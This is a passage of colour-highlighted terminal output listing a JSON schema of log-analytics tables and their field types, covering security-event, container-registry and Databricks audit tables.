\u001b[94m\"FlexNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalLogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Protocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceiptTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestClientApplication\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCookies\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"SimplifiedDeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatConfidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ComputerGroup\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryLoginEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JwtId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryRepositoryEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"ArtifactType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Digest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MediaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Repository\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Size\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tag\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksAccounts\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksClusters\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksDBFS\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksJobs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksNotebook\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSQLPermissions\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSSH\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSecrets\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksTables\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksWorkspace\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: 